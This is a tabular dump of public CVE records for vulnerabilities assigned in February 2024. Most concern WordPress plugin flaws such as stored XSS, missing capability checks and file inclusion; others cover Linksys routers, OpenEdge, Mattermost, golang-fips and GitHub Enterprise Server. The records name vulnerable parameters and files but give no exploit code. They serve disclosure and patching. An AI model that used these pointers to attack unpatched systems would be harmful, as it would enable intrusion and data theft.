CVE    2024    1408    Candidate    The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's edit-profile-text-box shortcode in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping on user supplied attributes such as 'type'. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/sr/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L524   |   URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/sr/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L524   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/6e50081f-6658-4cc7-bf0a-d04464820926?source=cve    Assigned (20240209)
CVE    2024    1406    Candidate    A vulnerability was found in Linksys WRT54GL 4.30.18. It has been declared as problematic. This vulnerability affects unknown code of the file /SysInfo1.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. VDB-253330 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/3   |   URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/3   |   MISC:https://vuldb.com/?ctiid.253330   |   URL:https://vuldb.com/?ctiid.253330   |   MISC:https://vuldb.com/?id.253330   |   URL:https://vuldb.com/?id.253330    Assigned (20240209)
CVE    2024    1405    Candidate    A vulnerability was found in Linksys WRT54GL 4.30.18. It has been classified as problematic. This affects an unknown part of the file /wlaninfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier VDB-253329 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/2   |   URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/2   |   MISC:https://vuldb.com/?ctiid.253329   |   URL:https://vuldb.com/?ctiid.253329   |   MISC:https://vuldb.com/?id.253329   |   URL:https://vuldb.com/?id.253329    Assigned (20240209)
CVE    2024    1404    Candidate    A vulnerability was found in Linksys WRT54GL 4.30.18 and classified as problematic. Affected by this issue is some unknown functionality of the file /SysInfo.htm of the component Web Management Interface. The manipulation leads to information disclosure. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253328. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/1   |   URL:https://github.com/leetsun/Hints/tree/main/linksys-wrt54gl/1   |   MISC:https://vuldb.com/?ctiid.253328   |   URL:https://vuldb.com/?ctiid.253328   |   MISC:https://vuldb.com/?id.253328   |   URL:https://vuldb.com/?id.253328    Assigned (20240209)
CVE    2024    1403    Candidate    In OpenEdge Authentication Gateway and AdminServer prior to 11.7.19, 12.2.14, 12.8.1 on all platforms supported by the OpenEdge product, an authentication bypass vulnerability has been identified. The vulnerability is a bypass to authentication based on a failure to properly handle username and password. Certain unexpected content passed into the credentials can lead to unauthorized access without proper authentication.    MISC:https://community.progress.com/s/article/Important-Critical-Alert-for-OpenEdge-Authentication-Gateway-and-AdminServer   |   URL:https://community.progress.com/s/article/Important-Critical-Alert-for-OpenEdge-Authentication-Gateway-and-AdminServer   |   MISC:https://www.progress.com/openedge   |   URL:https://www.progress.com/openedge    Assigned (20240209)
CVE    2024    1402    Candidate    Mattermost fails to check if a custom emoji reaction exists when sending it to a post and to limit the amount of custom emojis allowed to be added in a post, allowing an attacker sending a huge amount of non-existent custom emojis in a post to crash the mobile app of a user seeing the post.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240209)
CVE    2024    1401    Candidate    The Profile Box Shortcode And Widget WordPress plugin before 1.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)    MISC:https://wpscan.com/vulnerability/91064ba5-cf65-46e6-88df-0e4d96a3ef9f/   |   URL:https://wpscan.com/vulnerability/91064ba5-cf65-46e6-88df-0e4d96a3ef9f/    Assigned (20240209)
CVE    2024    1400    Candidate    The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to duplicate arbitrary posts and pages.    MISC:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php   |   URL:https://plugins.trac.wordpress.org/changeset/3046896/mollie-forms/trunk/classes/Admin.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve    Assigned (20240209)
CVE    2024    1398    Candidate    The Ultimate Bootstrap Elements for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘heading_title_tag’ and ‘heading_sub_title_tag’ parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L50   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L50   |   MISC:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L61   |   URL:https://plugins.trac.wordpress.org/browser/ultimate-bootstrap-elements-for-elementor/tags/1.3.6/templates/elements/heading.php#L61   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed191380-6037-4d59-8db7-cb33136a304e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ed191380-6037-4d59-8db7-cb33136a304e?source=cve    Assigned (20240209)
CVE    2024    1397    Candidate    The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's blocks in all versions up to, and including, 2.4.6 due to insufficient input sanitization and output escaping on the 'titleTag' user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/accordion-card/index.php#L17   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/accordion-card/index.php#L17   |   MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/cta/index.php#L22   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/cta/index.php#L22   |   MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/info-box/index.php#L55   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/info-box/index.php#L55   |   MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/section-title/index.php#L89   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/section-title/index.php#L89   |   MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/team/index.php#L28   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/team/index.php#L28   |   MISC:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/testimonial/index.php#L124   |   URL:https://plugins.trac.wordpress.org/browser/ht-mega-for-elementor/tags/2.4.4/htmega-blocks/src/blocks/testimonial/index.php#L124   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3048999%40ht-mega-for-elementor&new=3048999%40ht-mega-for-elementor&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8ac66027-14b8-4e0a-a483-c014905ef04e?source=cve    Assigned (20240209)
CVE    2024    1394    Candidate    A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.    MISC:RHBZ#2262921   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2262921   |   MISC:RHSA-2024:1462   |   URL:https://access.redhat.com/errata/RHSA-2024:1462   |   MISC:RHSA-2024:1468   |   URL:https://access.redhat.com/errata/RHSA-2024:1468   |   MISC:RHSA-2024:1472   |   URL:https://access.redhat.com/errata/RHSA-2024:1472   |   MISC:RHSA-2024:1501   |   URL:https://access.redhat.com/errata/RHSA-2024:1501   |   MISC:RHSA-2024:1502   |   URL:https://access.redhat.com/errata/RHSA-2024:1502   |   MISC:https://access.redhat.com/security/cve/CVE-2024-1394   |   URL:https://access.redhat.com/security/cve/CVE-2024-1394   |   MISC:https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6   |   URL:https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6    Assigned (20240209)
CVE    2024    1393    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'icon_align' attribute of the Content Switcher widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/content-switcher/skins/skin-3.php#L39   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/content-switcher/skins/skin-3.php#L39   |   MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/content-switcher/skins/skin-3.php#L39   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/content-switcher/skins/skin-3.php#L39   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bb0888d6-30e6-4957-b270-1968eace462e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bb0888d6-30e6-4957-b270-1968eace462e?source=cve    Assigned (20240208)
CVE    2024    1392    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'button1_icon' attribute of the Dual Button widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/dual-button/widgets/dual-button.php#L885   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/dual-button/widgets/dual-button.php#L885   |   MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/dual-button/widgets/dual-button.php#L885   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/dual-button/widgets/dual-button.php#L885   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/33d7dc4d-bb41-456a-bd1a-37d8f2aada30?source=cve    Assigned (20240208)
CVE    2024    1391    Candidate    The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘eae_custom_overlay_switcher’ attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/bg-slider/module.php#L255   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.12.12/modules/bg-slider/module.php#L255   |   MISC:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/bg-slider/module.php#L255   |   URL:https://plugins.trac.wordpress.org/browser/addon-elements-for-elementor-page-builder/tags/1.13/modules/bg-slider/module.php#L255   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/977bab12-969d-4b15-9942-2b17c8541f61?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/977bab12-969d-4b15-9942-2b17c8541f61?source=cve    Assigned (20240208)
CVE    2024    1390    Candidate    The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the creating_pricing_table_page function in all versions up to, and including, 2.11.1. This makes it possible for authenticated attackers, with subscriber access or higher, to create pricing tables.    MISC:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/admin/class-admin-subscription-plans.php#L477   |   URL:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/admin/class-admin-subscription-plans.php#L477   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/10f00859-3adf-40ff-8f33-827bbb1f62df?source=cve    Assigned (20240208)
CVE    2024    1389    Candidate    The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pms_stripe_connect_handle_authorization_return function in all versions up to, and including, 2.11.1. This makes it possible for unauthenticated attackers to change the Stripe payment keys.    MISC:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/gateways/stripe/admin/functions-admin-connect.php#L11   |   URL:https://plugins.trac.wordpress.org/browser/paid-member-subscriptions/trunk/includes/gateways/stripe/admin/functions-admin-connect.php#L11   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3034497%40paid-member-subscriptions%2Ftrunk&old=3031453%40paid-member-subscriptions%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/cd5f5861-5be4-456d-915d-bafb7bff2110?source=cve    Assigned (20240208)
CVE    2024    1388    Candidate    The Yuki theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_customizer_options() function in all versions up to, and including, 1.3.13. This makes it possible for authenticated attackers, with subscriber-level access and above, to reset the theme's settings.    MISC:https://themes.trac.wordpress.org/changeset/217428/yuki/1.3.14/inc/extensions/class-reset-extension.php   |   URL:https://themes.trac.wordpress.org/changeset/217428/yuki/1.3.14/inc/extensions/class-reset-extension.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d964e0ef-f14e-463b-bf4e-3f25788df03c?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d964e0ef-f14e-463b-bf4e-3f25788df03c?source=cve    Assigned (20240208)
CVE    2024    1383    Candidate    The WPvivid Backup for MainWP plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 0.9.32 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.    MISC:https://plugins.trac.wordpress.org/browser/wpvivid-backup-mainwp/trunk/wpvivid-backup-mainwp.php#L525   |   URL:https://plugins.trac.wordpress.org/browser/wpvivid-backup-mainwp/trunk/wpvivid-backup-mainwp.php#L525   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3040939%40wpvivid-backup-mainwp&new=3040939%40wpvivid-backup-mainwp&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2a8430ed-6aeb-46a3-8c42-59646845706e?source=cve    Assigned (20240208)
CVE    2024    1382    Candidate    The Restaurant Reservations plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.9 via the nd_rst_layout attribute of the nd_rst_search shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where an uploaded PHP file may not be directly accessible.    MISC:https://plugins.trac.wordpress.org/browser/nd-restaurant-reservations/trunk/addons/visual/search/index.php#L49   |   URL:https://plugins.trac.wordpress.org/browser/nd-restaurant-reservations/trunk/addons/visual/search/index.php#L49   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3045964%40nd-restaurant-reservations%2Ftrunk&old=2980579%40nd-restaurant-reservations%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d51db160-c701-426d-890f-73cc4785cad8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d51db160-c701-426d-890f-73cc4785cad8?source=cve    Assigned (20240208)
CVE    2024    1381    Candidate    The Page Builder Sandwich – Front End WordPress Page Builder Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.1.0. This makes it possible for authenticated attackers, with subscriber access and higher, to extract sensitive user or configuration data.    MISC:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/trunk/class-inspector.php#L90   |   URL:https://plugins.trac.wordpress.org/browser/page-builder-sandwich/trunk/class-inspector.php#L90   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/8e98d92a-fe64-4591-972b-ed11542506b7?source=cve    Assigned (20240208)
CVE    2024    1380    Candidate    The Relevanssi – A Better Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the relevanssi_export_log_check() function in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data. The vendor has indicated that they may look into adding a capability check for proper authorization control, however, this vulnerability is theoretically patched as is.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve    Assigned (20240208)
CVE    2024    1379    Candidate    The Website Article Monetization By MageNet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'abp_auth_key' parameter in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping and a missing authorization check. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/website-article-monetization-by-magenet/trunk/admin/article-backlinks-admin.php#L110   |   URL:https://plugins.trac.wordpress.org/browser/website-article-monetization-by-magenet/trunk/admin/article-backlinks-admin.php#L110   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b8564dbb-6be8-4999-be65-d28609e05451?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b8564dbb-6be8-4999-be65-d28609e05451?source=cve    Assigned (20240208)
CVE    2024    1378    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring SMTP options. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1377    Candidate    The Happy Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘author_meta_tag’ attribute of the Author Meta widget in all versions up to, and including, 3.10.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons   |   URL:https://plugins.trac.wordpress.org/changeset/3044937/happy-elementor-addons   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b61eb8b7-0d89-47ef-831c-1772d01e2c85?source=cve    Assigned (20240208)
CVE    2024    1374    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring audit log forwarding. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1373    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-46209. Reason: This candidate is a duplicate of CVE-2023-46209. Notes: All CVE users should reference CVE-2023-46209 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240208)
CVE    2024    1372    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when configuring SAML settings. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
CVE    2024    1370    Candidate    The Maintenance Page plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the subscribe_download function hooked via AJAX action in all versions up to, and including, 1.0.8. This makes it possible for authenticated attackers, with subscriber access or higher, to download a csv containing subscriber emails.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037664%40maintenance-page%2Ftrunk&old=1218033%40maintenance-page%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/1fce54b1-e1e6-4742-9eb3-bbfb613ccd70?source=cve    Assigned (20240208)
CVE    2024    1369    Candidate    A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when setting the username and password for collectd configurations. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .    MISC:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   URL:https://docs.github.com/en/enterprise-server@3.10/admin/release-notes#3.10.7   |   MISC:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   URL:https://docs.github.com/en/enterprise-server@3.11/admin/release-notes#3.11.5   |   MISC:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   URL:https://docs.github.com/en/enterprise-server@3.8/admin/release-notes#3.8.15   |   MISC:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10   |   URL:https://docs.github.com/en/enterprise-server@3.9/admin/release-notes#3.9.10    Assigned (20240208)
